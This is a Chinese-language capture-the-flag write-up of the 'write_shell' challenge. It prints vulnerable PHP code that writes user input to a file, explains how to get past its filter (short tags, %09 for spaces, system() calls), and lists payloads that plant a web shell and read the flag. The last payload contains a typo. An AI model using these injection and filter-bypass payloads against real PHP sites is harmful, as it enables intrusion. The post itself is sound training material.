练[红明谷CTF 2021]write_shell

[红明谷CTF 2021]write_shell


在这里插入图片描述

掌握知识

​ 代码审计,短标签的使用,命令执行一些bypass操作,替换空格,只有一行php代码最后可以不需要分号

解题思路

  1. 打开题目链接,就看见一屏幕的代码,很明显是代码审计的题目,通过对代码的简单分析,我们可以经过传参将php代码写入到index.php里,在写入代码之前会对php代码进行过滤,上传的目录文件是根据请求头自动生成的。下面就是代码
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>
代码分析
  1. 接下来进行详细分析,传递的action的参数值为pwd即输出index.php所在的目录,传递upload,会将传入的data的参数值写入到index.php文件,但在此之前需要进入waf函数进行判断
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
  1. waf函数主要是判断传入的参数值是否是数组,若是数组会将参数分开分别进入到check函数进行参数过滤
function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}
  1. 到了关键的check函数,该函数就是对传入参数进行过滤的函数,很显然过滤了很多比较关键的字符
对于空格替换的字符还是很多的,可以使用%09 %20进行替换,也可以使用一些特殊符号和变量
对于过滤_,意味着不能使用一句话木马的格式了
过滤php字符串,可以使用短标签来进行绕过
过滤;,根据php代码特性,如果只有一行代码,在最后也可以不需要分号
过滤eval函数,还可以使用其他函数,比如直接system()函数进行命令执行
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}
开始解题
  1. 有了上面的分析过程,paylaod也有了雏形,使用短标签的形式利用system函数进行命令执行/?action=upload&data=<?=system("ls")?>查看当前目录的文件。再传入action=pwd查看上传的目录,访问目录下的index.php查看到命令的回显结果

image-20230930174540105

image-20230930174631134

image-20230930174637062

image-20230930174643585

  1. 再构建paylaod尝试查看根目录下的文件,由于被过滤了空格,可以使用%09进行绕过,再次查看index.php文件发现flag文件

image-20230930174729538

image-20230930174807323

  1. 再次修改system的命令参数,使用cat查看flag文件,再访问index.php,拿下flag

image-20230930174922549

image-20230930174925525

关键paylaod

/?action=pwd

/?action=upload&data=<?=system("ls")?>

/?action=upload&data=<?=system("ls%09/")?>

/?action=upload&data=<?=system("cat%/flllllll1112222222lag")?>
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值